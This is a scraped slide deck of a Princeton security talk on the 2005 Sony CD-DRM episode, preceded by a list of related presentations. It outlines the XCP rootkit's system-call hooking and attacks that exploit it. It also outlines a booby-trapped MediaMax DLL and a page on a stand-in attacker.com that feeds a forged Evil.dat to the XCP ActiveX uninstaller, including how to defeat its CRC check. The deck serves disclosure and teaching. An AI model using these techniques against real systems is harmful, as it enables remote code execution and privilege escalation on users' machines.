1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of.

Slides:



Advertisements
Similar presentations
Keep Your PC Safe (Windows 7, Vista or XP) Nora Lucke 02/05/2012 Documents - security.
Advertisements

Thank you to IT Training at Indiana University Computer Malware.
Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.
1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
 Application software consists of programs designed to make users more productive and/or assist with personal tasks.  Growth of internet simplified.
Day anti-virus anti-virus 1 detecting a malicious file malware, detection, hiding, removing.
1 The Sony CD DRM Debacle A case study of digital rights management.
3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.
CD DRM & SONY-BMG: a case study Muhammed Afzal Hussain Digital Rights Management Seminar 17 th May, 2006.
1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy.
To Protect or Not Protect Sony/BMG’s DRM Dilemma Sony’s Attempt-- Sony/BMG’s digital right’s management (DRM) “rootkit” inclusion on their music.
The Downside to DRM. What is DRM? “Digital Rights Management” Software used to control access to copyrighted material Protect company from piracy.
Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.
Rootkits: Sneaky, Stealthy Toolboxes
Chapter 9 Security Malware Defenses. Malware Can be used for a form of blackmail. Example: Encrypts files on victim disk, then displays message.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
February 28, The Sony BMG DRM Debacle Corynne McSherry, Staff Attorney.
No.24 Prerawat Denvutivorkarn M.2/2. Definition: "antivirus" is protective software designed to defend your computer against malicious software. Malicious.
Chapter Nine Maintaining a Computer Part III: Malware.
Microsoft ® Official Course Module 9 Configuring Applications.
© 2008 The McGraw-Hill Companies, Inc. All rights reserved. M I C R O S O F T ® Preparing for Electronic Distribution Lesson 14.
eScan Total Security Suite with Cloud Security
First Community Bank Prevx Safe Online Rollout & Best Practice Presentation.
With Microsoft Windows 7© 2012 Pearson Education, Inc. Publishing as Prentice Hall1 PowerPoint Presentation to Accompany GO! with Microsoft ® Windows 7.
The World-Wide Web. Why we care? How much of your personal info was released to the Internet each time you view a Web page? How much of your personal.
Data Security.
Keeping your computer current and trouble free Aaron Robertson.
Introducing, Installing, and Upgrading Windows 7 Lesson 7.
Networking Security Chapter 8 powered by dj. Chapter Objectives  Explain various security threats  Monitor security in Windows Vista  Explain basic.
JavaScript, Fourth Edition
1 J. Alex Halderman Legal Challenges in Security Research J. Alex Halderman Center for Information Technology Policy Department of Computer Science Princeton.
COMPREHENSIVE Windows Tutorial 5 Protecting Your Computer.
Rootkits. EC-Council The Problem  Microsoft Corp. security researchers are warning about a new generation of powerful system-monitoring programs, or.
®® Microsoft Windows 7 Windows Tutorial 5 Protecting Your Computer.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Mathieu Castets October 17th,  What is a rootkit?  History  Uses  Types  Detection  Removal  References 2/11.
Chapter 3 Installing and Learning Software. 2Practical PC 5 th Edition Chapter 3 Getting Started In this Chapter, you will learn: − What is in an application.
Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Computer Hardware and Software Maintenance.
3.05 Protect Your Computer and Information Unit 3 Internet Basics.
COSC 513 Operating Systems Project Presentation: Internet Security Instructor: Dr. Anvari Student: Ying Zhou Spring 2003.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
Malicious Attacks By: Albert, Alex, Andon, Ben, Robert.
Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?
Computer Skills and Applications Computer Security.
Matthew Glenn AP2 Techno for Tanzania This presentation will cover the different utilities on a computer.
1 Computer Technician Computer Software: Types, Setup, and Ethical Boundaries Copyright © Texas Education Agency, All rights reserved.
"Most people, I think, don't even know what a rootkit is, so why should they care about it?" - Thomas Hesse, President of Sony's Global Digital Business.
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
Digital Rights Management Zach Milko. Overview Definition Why it exists DRM Today  Fairplay Opponents of DRM  DefectiveByDesign.org Future Conclusion.
Active X and Signed Applets Chad Bollard. Overview ActiveX  Security Features  Hidden Problems Signed Applets  Security Features  Security Problems.
Vulnerabilities in Operating Systems Michael Gaydeski COSC December 2008.
CIW Lesson 8 Part B. Malicious Software application that installs hidden services on systems term for software whose specific intent is to harm computer.
John Samuels October, Why Now?  Vista Problems  New Features  >4GB Memory Support  Experience.
Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.
By the end of this lesson you will be able to: 1. Determine the preventive support measures that are in place at your school.
Antivirus Software Technology By Mitchell Zell. Intro  Computers are vulnerable to attack  Most common type of attack is Malware  Short for malicious.
SemiCorp Inc. Presented by Danu Hunskunatai GGU ID #
NETWORK SECURITY LAB 1170 REHAB ALFALLAJ CT1406. Introduction There are a number of technologies that exist for the sole purpose of ensuring that the.
Computer Security Keeping you and your computer safe in the digital world.
Windows Vista Configuration MCTS : Internet Explorer 7.0.
Database and Cloud Security
Botnets A collection of compromised machines
Chapter 3 Installing and Learning Software
Various Types of Malware
Rootkit A rootkit is a set of tools which take the ability to access a computer or computer network at administrator level. Generally, hackers install.
Botnets A collection of compromised machines
By Jake Schmitt, Seth Raleigh, Neil McLain
Local Administrator Rights
WELCOME TO MY AVG ANTIVIRUS AVG is antivirus software that is known in the market from a long time period this particular antivirus software is known for.
Presentation transcript:

1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University

2 J. Alex Halderman The “Episode” - Fall 2005 World’s second largest music company Major anti-piracy plan, gone badly awry Millions of copies of dangerous software Hundreds of thousands of PCs at risk International protests, class-action suits Multi-million dollar recall, settlements Changed perceptions of DRM—showed can be a security threat

3 J. Alex Halderman First4InternetSunnComm “Light years beyond encryption™” 52 titles 4.7 million discs 37 titles 20 million discs

4 J. Alex Halderman Research in the Blogosphere 27 blog posts, 100’s of comments Rapid collaboration with researchers (and amateurs) around the world Paper sections posted online while writing

5 J. Alex Halderman Our Contributions XCP rootkit privilege escalation attack XCP and MediaMax uninstaller remote exploits MM patch triggers the attack it purports to fix MM spyware-like behaviors MM watermark technology analysis and attacks Analysis and holes in active and passive CD DRM XCP contains GPL code to work with iPod DRM Analysis of CD DRM security problems in the broader context of computer security

6 J. Alex Halderman CD DRM CD Players Plays normally Computers Restricted use e.g. Can’t copy disc Can’t rip as MP3 Can’t use on iPod

7 J. Alex Halderman How CD DRM Works First time a protected CD is inserted… 1.Autorun (normal Windows feature) executes installer from the CD 2.Installs active protection driver, between CD driver and apps 3.Driver remains on system Drivers Ripper/copier Application OS Protection driver

8 J. Alex Halderman How CD DRM Works Drivers Ripper/copier Application OS Protection driver Normal CD Drivers Ripper/copier Application OS Protection driver  # CD marked as protected User tries to rip or copy a disc… 1.Protection driver checks for watermark 2.If found, blocks access to audio

9 J. Alex Halderman Taxonomy of Attacks Prevent installation –Shift key –Magic marker –Non-Windows OS Interfere with watermark detection Disable or remove protection software

10 J. Alex Halderman DRM Challenges  Bad Behavior DRM weaknesses prompted vendors to resort to dangerous/unethical techniques that jeopardized user security –XCP rootkit –MM aggressive installation –XCP and MM ActiveX-based uninstallers

11 J. Alex Halderman The XCP Rootkit DRM challenge: Users will remove active protection XCP’s response: Install a rootkit to conceal the software

12 J. Alex Halderman XCP Rootkit: Discovery Mark Russinovich October 31, 2005

13 J. Alex Halderman XCP Rootkit: Operation Magic prefix: $sys$ Files Processes Registry keys Hidden

14 J. Alex Halderman XCP Rootkit: Problems Local privilege escalation –Hidden objects not limited to XCP software –Malware ran by non-privileged users can’t install own rootkit, but can utilize XCP’s –Use to hide from virus checkers, admin tools Exploits in wild Backdoor.Ryknos.B Trojan.Welomoch

15 J. Alex Halderman “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse President, Sony BMG Global Digital Business “It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.” — Stewart Baker Asst. U.S. Secretary of Homeland Security

16 J. Alex Halderman MediaMax Aggressive Installer DRM challenge: Users will decline to install protection software MM’s response: Install aggressively, regardless of consent

17 J. Alex Halderman MediaMax Installation 13+ MB installed before EULA screen Commonly, active protection permanently activated even if EULA declined

18 J. Alex Halderman MediaMax Installation: Problem Everyone — Full Control Jesse Burns and Alex Stamos December 6, 2005

19 J. Alex Halderman MediaMax Installation: Attack 1.Attacker prepares booby-trapped MediaMax.dll, malicious code in DllMain() function 2.Non-privileged user replaces installed file with attack version 3.Privileged user inserts CD 4.Even before displaying a EULA, software on CD calls MediaMax.dll code to check version 5.Attack code runs with privileges

20 J. Alex Halderman Aggression Exacerbates Repairs Permissions reset to non-secure state whenever disc inserted. Sony releases patch… …but, the patch calls code in MediaMax.dll. If already booby- trapped, will set off attack code. How do users know they need to patch? Vulnerable even if have refused installation.

21 J. Alex Halderman XCP and MediaMax Uninstallers DRM challenge: Angry customers demand to uninstall protection software XCP and MM response: Offer uninstallers, but use online design to limit access

22 J. Alex Halderman XCP Uninstaller: Step 1

23 J. Alex Halderman XCP Uninstaller: Step 2 Wait for (hours)

24 J. Alex Halderman XCP Uninstaller: Step 3

25 J. Alex Halderman XCP Uninstaller: Step 4 Wait for second (several days)

26 J. Alex Halderman XCP Uninstaller: Step 5 Finally, visit web page and run uninstaller* * But if you insert the CD again, go back to step 1!

27 J. Alex Halderman XCP Uninstaller: Operation “HTTP GET /XCP.dat” XCP Uninstall web page: CodeSupport.Uninstall(“ Server sony-bmg.com XCP.dat Client CodeSupport.ocx Client extracts InstallLite.dll from XCP.dat, calls function UnInstall_xcp ActiveX control will accept arbitrary URL Code from that URL is not authenticated Control is not removed after use Problems:

28 J. Alex Halderman XCP Uninstaller: Attack “HTTP GET /Evil.dat” Victim visits attacker’s web page: CodeSupport.Uninstall(“ Server attacker.com Evil.dat Client CodeSupport.ocx Client extracts InstallLite.dll from Evil.dat, calls function UnInstallXCP Attack code runs with local user’s privileges Attacker constructs Evil.dat1. Creates InstallLite.dll and puts attack code in UninstallXCP function

29 J. Alex Halderman MediaMax Uninstaller “Oops!... I did it again”

30 J. Alex Halderman MediaMax Uninstaller “GET /validate.asp?key=3984-…” MediaMax Uninstall web page: AxWebRemove.Remove( , “ Server sunncomm.com “ Client AxWebRemove.ocx Client calls function ECF7() from WebRem.dll “GET /webrem.dll” Server sunncomm.com WebRem.dll Client AxWebRemove.ocx 3.

31 J. Alex Halderman Aftermath XCP discs recalled; MediaMax halted …but still in many stores and CD collections Major class-action suits settled Customers can trade discs for cash, MP3 downloads, and non-DRM versions Sony won’t use CD DRM, for now

32 J. Alex Halderman Takeaway Lessons Aggressive DRM can have dangerous consequences: harm to user security Effective DRM may require undermining the user’s control…and thus ability to defend against security threats Look for similar problems in the future

33 J. Alex Halderman The Stakes are High Bad DRM can… Harm users Create major liability for content owners Reduce sales for artists Ultimately, reduce incentives to create

34 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University

35 J. Alex Halderman Chronology 31Oct. 3Nov Dec Oct.31Rootkit revealed Nov.3 Sony releases XCP patch 10First suits filed against Sony 14XCP patch/uninstaller hole 15Sony recalls XCP discs 17 MediaMax uninstaller hole Dec.6MediaMax player hole 7Hole in patch for MediaMax player hole 30First suits settled

36 J. Alex Halderman XCP Rootkit: Operation KeQueryDirectoryFile0x8060bb9c KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel Normal Windows system call (List files in a directory)

37 J. Alex Halderman KeQueryDirectoryFile0x0f967bfa KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel int Rootkit_QueryDirectoryFile(…) {… if filename begins with “$sys$”: remove from results 0xf967bfa: Rootkit (Aries.sys) XCP Rootkit: Operation

38 J. Alex Halderman Constructing Evil.dat Archive files protected with proprietary CRC 1.Prepare Evil.dat with random CRC 2.Run with breakpoint at line 2 3.Take computed CRC and place in Evil.dat Header: Name=“UninstallXCP.dat” CRC=0x03cb1a88 ActiveX control: 1.C = ComputeCRC( ) 2.If C != Header.CRC then Terminate 3.Extract and execute file Lesson: Use a digital signature!

39 J. Alex Halderman CD DRM as Spyware Both XCP and MediaMax: “Phone home” about each title played despite privacy statement to the contrary Ship without a meaningful uninstaller Install without consent or exceed consent Spyware is hard to define, but these meet most common definitions.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.